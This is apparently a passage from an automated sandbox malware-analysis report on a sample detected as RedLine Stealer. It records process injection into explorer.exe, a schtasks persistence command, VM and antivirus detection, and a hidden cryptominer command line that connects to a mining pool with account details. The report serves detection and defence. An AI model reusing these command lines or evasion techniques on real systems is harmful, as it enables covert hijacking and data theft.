Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F7D30 push eax; retn 0009h 9_2_097F7D32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F7E69 push eax; retn 0009h 9_2_097F7E6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8110 push edx; retn 0009h 9_2_097F8112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8091 push ecx; retn 0009h 9_2_097F8092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F82F1 push edx; retn 0009h 9_2_097F82F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3571 push ds; retn 0009h 9_2_097F3572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8570 push ebx; retn 0009h 9_2_097F857A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3541 push ds; retn 0009h 9_2_097F3542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3590 push ds; retn 0009h 9_2_097F3592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F97D8 push ecx; ret 9_2_097F97E5
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623B00 push rax; retf 10_2_00623B01
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623BFF push rax; iretd 10_2_00623C01
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_006238C0 push rax; retn 0009h 10_2_006238C1
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623AB7 push rax; retf 0009h 10_2_00623AC1
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00409B00 push rax; retf 22_2_00409B01
PE file contains sections with non-standard names
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name: .loHdXUK
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name: .adata
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name: .2w140TT
Source: sistem.exe.1.dr Static PE information: section name: .adata
PE file contains an invalid checksum
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: real checksum: 0x378b16 should be: 0x37c3ee
Source: sistem.exe.1.dr Static PE information: real checksum: 0x374485 should be: 0x363658
Source: initial sample Static PE information: section name: entropy: 7.99714150919
Source: initial sample Static PE information: section name: entropy: 7.89828462596
Source: initial sample Static PE information: section name: entropy: 7.99330469272
Source: initial sample Static PE information: section name: entropy: 7.78378163159
Source: initial sample Static PE information: section name: .rsrc entropy: 7.22431447957
Source: initial sample Static PE information: section name: .loHdXUK entropy: 7.91937517669
Source: initial sample Static PE information: section name: entropy: 7.99376649228
Source: initial sample Static PE information: section name: entropy: 7.99416148233
Source: initial sample Static PE information: section name: entropy: 7.79638828934
Source: initial sample Static PE information: section name: .rsrc entropy: 7.95896631222
Source: initial sample Static PE information: section name: .2w140TT entropy: 7.91810923308

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Temp\Microsoft.exe
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Temp\sistem.exe
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 7777
Source: unknown Network traffic detected: HTTP traffic on port 7777 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 7777
Source: unknown Network traffic detected: HTTP traffic on port 7777 -> 49779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1836 Thread sleep time: -16602069666338586s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window / User API: threadDelayed 3398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window / User API: threadDelayed 5671
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Is looking for software installed on the system
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: conhost.exe, 00000011.00000003.755448964.00000201F483F000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
Source: AppLaunch.exe, 00000001.00000002.739738609.000000000A288000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_2_004074B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004074B7

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: mine.bmpool.org
Source: C:\Windows\explorer.exe Network Connect: 157.90.156.89 116
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1B0F37B0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 201F1F70000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 224D5930000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 25F9A6F0000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Thread created: C:\Windows\System32\conhost.exe EIP: F37B0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: F1F70000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: D5930000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 9A6F0000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: D3B008
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: F18008
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Memory written: C:\Windows\System32\conhost.exe base: 1B0F37B0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 201F1F70000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 2E2010
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 224D5930000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 10FF010
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory written: C:\Windows\System32\conhost.exe base: 25F9A6F0000
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140001000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6924 base: 2E2010 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140001000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 4876 base: 10FF010 value: 00
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6924
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 4876
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
Uses taskkill to terminate processes
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\explorer.exe Code function: 27_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 27_2_000000014031010C

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
